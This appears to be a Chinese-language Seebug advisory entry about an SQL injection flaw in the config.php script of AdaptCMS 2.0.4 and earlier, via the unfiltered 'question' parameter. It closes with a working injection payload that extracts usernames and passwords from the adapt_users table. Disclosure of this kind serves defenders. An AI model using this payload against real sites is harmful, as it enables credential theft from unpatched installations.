AdaptCMS 'config.php' SQL 注入漏洞

2013-02-16T00:00:00
ID SSV:60631
Type seebug
Reporter Root
Modified 2013-02-16T00:00:00

Description

BUGTRAQ ID: 57674

AdaptCMS是Insane Visions发布的网站内容管理系统。

AdaptCMS 2.0.4及之前版本的config.php脚本没有正确过滤 'question'参数值,可允许攻击者在后端数据库中注入或操作SQL查询,导致操纵或泄漏任意数据。 0 AdaptCMS 2.0.2 AdaptCMS 2.0.1 AdaptCMS 2.0 厂商补丁:

AdaptCMS

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.adaptcms.com

                                        
                                            
                                                article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660), (null, 0, (select concat(username, 0x3a, password) from adapt_users), 'option', '', 1, 1337, 1349597648  )